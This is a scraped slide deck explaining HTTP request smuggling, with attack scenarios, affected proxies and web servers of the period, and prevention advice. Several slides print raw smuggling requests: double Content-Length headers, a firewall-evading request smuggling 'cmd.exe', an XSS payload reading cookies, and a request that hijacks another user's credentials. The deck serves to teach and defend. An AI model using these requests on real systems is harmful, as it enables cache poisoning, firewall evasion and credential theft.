Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Http requesting smuggling


Published on

  • Be the first to comment

  • Be the first to like this

Http requesting smuggling

  2. 2. Overview of HTTP Request Smuggling• A result of a device failure to properly handle deformed inbound HTTP requests• Attacker sends multiple special HTTP requests that cause the two attacked entities to see two different sets of requests.• Allows the hacker to smuggle a request to one device without the other device being aware of it.• HRS does not require the existence of an application vulnerability. 2
  3. 3. Threats• Financial loss result of web site deforming.• Steal user credential using cross site scripting• Warm attack like Nimda by attacking web filter firewalls. 3
  4. 4. Basic Concept 4
  5. 5. Terminology• HTTP header• Web proxy (e.g:Squid, ISA server 200)• Web server (e.g:Tomcat,IIS,Apache,Weblogic) 5
  6. 6. HTTP header 6
  7. 7. Web proxy• Examples: Squid, ISA server 2000• Acts as an intermediary for requests from clients seeking resources or services from other servers• Resources like file, connection, web page• Services like request to web server, done to simplify and control complexity 7
  8. 8. Web server• HTTP server or application server• Is a program that serves content using the HTTP protocol• Example: Tomcat, IIS, Apache, Weblogic 8
  9. 9. History Of HTTP SMUGGLING• Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and 7.0 had input validation error• Sun java proxy 3.x, 4.x and Sun one app server 7.x, 8.x easily lead to web cache poisoning because of non-standard HTTP behavior.• Oracle’s corrupt cache server led to the inability of the firewall to detect malicious requests 9
  10. 10. Basic concept 10
  11. 11. Scenario 1• An attacker can launch a smuggling attack in order to poison the cache server.• Attacker an change the entries in the cache, so that an existing page A would be cached under URL B.• This type of attack is on the cache server. 11
  12. 12. Scenario 2• Smuggling bypasses the firewall installed before the web server.• Directly compromises web security.• This attack is in the web server itself. 12
  13. 13. Scenario 3• Use of proxy server that shares TCP connection with web server.• Attacker steals client credentials without contact.• Potentially strong attack. 13
  14. 14. Setting 3 continued…. 14
  15. 15. Types of Attacks• Cross-Site Scripting (XSS)• Web Cache Poisoning (defacement)• Cross User attacks• Hijacking pages with user-specific information• Browser cache poisoning 15
  16. 16. Cross-site Scripting• Injects client-side malicious code• Folds malicious content into content delivered from a compromised site• Special case of code injection• Examples 16
  17. 17. Cross-site Scripting 17
  18. 18. Cache Poisoning• Find vulnerable code• Flush out cache server actual content• Send special request which gets stored• The response to any client request will be the infected content 18
  19. 19. Cache Poisoning 19
  20. 20. Cross User Attacks• Single request to create 2 responses• Second response mis-interpreted as response to different query• May be other user sharing same TCP connection• Mimic behaviour and obtain private info 20
  21. 21. Cross User attacks 21
  22. 22. Hijacking pages with user-specific information 22
  23. 23. Example with code 23
  24. 24. Web Cache Poisoning(header)1 POST http://SITE/foobar.html HTTP/1.12 Host: SITE3 Connection: Keep-Alive4 Content-Type: application/x-www-form-urlencoded5 Content-Length: 06 Content-Length: 447 [CRLF]8 GET /poison.html HTTP/1.19 Host: SITE10 Bla: [space after the "Bla:", but no CRLF]11 GET http://SITE/page_to_poison.html HTTP/1.112 Host: SITE13 Connection: Keep-Alive14 [CRLF] 24
  25. 25. Web Cache Poisoning(Cache Server)• Cache Server reads LAST CONTENT HEADER• Web Server reads FIRST CONTENT HEADER 25
  26. 26. FIREWALL/IPS/IDS EVASION1 POST /page.asp HTTP/1.12 Host: chaim3 Connection: Keep-Alive4 Content-Length: 492235 [CRLF]6 zzz...zzz ["z" x 49152]7 POST /page.asp HTTP/1.08 Connection: Keep-Alive9 Content-Length: 3010 [CRLF]11 POST /page.asp HTTP/1.012 Bla: [space after the "Bla:", but no CRLF]13 POST /page.asp?cmd.exe HTTP/1.014 Connection: Keep-Alive15 [CRLF] 26
  27. 27. FIREWALL Parsing• Firewall reads the request with header length 49,223 bytes. line 6 (49,152 copies of "z") and lines 7-10 (in salmon, total of 71 bytes) as its body (49,152+71=49,223)• Then continues to parse the second request at line 11 and treats Line 13 till last as part of Bla 27
  28. 28. Overall Result• CMD.EXE gets smuggled• Popular Nimda and code red attack 28
  29. 29. REQUEST HIJACKING1 POST /some_script.jsp HTTP/1.02 Connection: Keep-Alive3 Content-Type: application/x-www-form-urlencoded4 Content-Length: 95 Content-Length: 20467 this=thatPOST /vuln_page.jsp HTTP/1.08 Content-Type: application/x-www-form-urlencoded9 Content-Length: 951011param1=value1&data=<script>alert("stealing%20your%20data:"%2bdocument.cookie)</script>&foobar= 29
  30. 30. ISA server 2000(cache server)/Tomcat Parsing• Microsoft ISA/2000 proxy server as a single POST request• Tomcat would interpret it as one complete HTTP POST(lines 1-7, including “this=that” on line 7)• And one incomplete POST request, whose declared body length is 95 bytes, but with only 94 bytes provided (lines 7-11) and is queued• The first (complete) request invokes a response (which is sent by ISA to the attacker). 30
  31. 31. Attackers Request• When ISA now receives a request from a client (e.g., a GET request), that request is forwarded to Tomcat,• Request:POST /vuln_page.jsp HTTP/1.0Content-Type: application/x-www-form-urlencodedContent-Length: 95• Below is gluedparam1=value1&data=<script>alert("stealing%20your%20data:"%2bdocument.cookie)</script>&foobar=G• Notice that the client will receive an HTML page with malicious Javascript code in it:<script>alert("stealing yourdata:"+document.cookie)</script> 31
  32. 32. REQUEST CREDENTIAL HIJACKING(THROUGH A PROXY SERVER)The attack is as follows:1. POST /some_script.jsp HTTP/1.02. Connection: Keep-Alive3. Content-Type: application/x-www-form-urlencoded4. Content-Length: 95. Content-Length: 1426. this=thatGET /some_page.jsp?param1=value1&param2=value2 HTTP/1.07. Content-Type: application/x-www-form-urlencoded8. Content-Length: 09. Foobar: 32
  33. 33. REQUEST CREDENTIAL HIJACKING(THROUGH A PROXY SERVER)When the client sends a request, such as:1. GET /mypage.jsp HTTP/1.02. Cookie: my_id=12345673. Authorization: Basic ugwerwguwygruwyTomcat will glue this to the queued incomplete request, and together,it will have:1. GET /some_page.jsp?param1=value1&param2=value2 HTTP/1.02. Content-Type: application/x-www-form-urlencoded3. Content-Length: 04. Foobar: GET /mypage.jsp HTTP/1.0• Cookie: my_id=1234567• Authorization: Basic ugwerwguwygruwy 33
  34. 34. HRS TECHNIQUES 34
  35. 35. Double Content-Length header• The cache server uses the last Content-Length header, while the web server uses the first Content-Length header (examples #1and #4).• The following cache servers were observed to use the last Content-Length header: Microsoft ISA/2000 Sun Microsystems SunONE 3.6 SP4• The following web servers were observed to use the first Content-Length header: Jakarta Tomcat 5.0.19 (Coyote/1.1) Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1 35
  36. 36. GET Request with Content-Length (backward smuggling)• The web servers that display this behavior are: Microsoft IIS/6.0 Jakarta Tomcat 5.0.19 (Coyote/1.1), Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1• Sample Attack:1 GET http://SITE/static_foobar.html HTTP/1.12 Connection: Keep-Alive3 Host: SITE4 Content-Type: application/x-www-form-urlencoded5 Content-Length: 4067 GET http://SITE/page_to_poison.html HTTP/1.18 Foo: GET /poison.html HTTP/1.09 36
  37. 37. CRLF SP CRLF trick• Entities that treat CRLF SP CRLF as a continuation of the previous header:: Checkpoint FW-1 kernel R55W beta Squid (under some conditions) Tomcat 4.1.24 (Coyote/1.0) Sun Microsystems SunONE web server 6.1 SP1• Web servers that treat CRLF SP CRLF as an end of headers mark: Microsoft IIS/5.0Sample Attack:1 POST /dynamic_foobar.asp HTTP/1.02 Connection: Keep-Alive3 Content-Type: application/x-www-form-urlencoded4 [SP]5 GET /malicious_url HTTP/1.06 37
  38. 38. CRLF SP CRLF trickSample Attack:1 POST /dynamic_foobar.asp HTTP/1.02 Connection: Keep-Alive3 Content-Type: application/x-www-form-urlencoded4 [SP]5 GET /malicious_url HTTP/1.061. FW-1 will send lines 1-6 to the web server (IIS/5.0)2. IIS/5.0 will interpret this input as two requests 38
  39. 39. Prevention• Install web application firewall which protects against the HRS attacks.• Terminate the client session after each session• Turn all pages to non-cacheable• Deploy web server which follows strict HTTP parsing procedure.• Allow only SSL communication from client to server.• Turn off TCP connection sharing on the intermediate devices. 39
  40. 40. Conclusion• Commonly Ignored because of its complications.• Difficult to detect in logs.• Poison proxy caches, pilfer credentials and leverage XSS without involving client 40
  41. 41. 41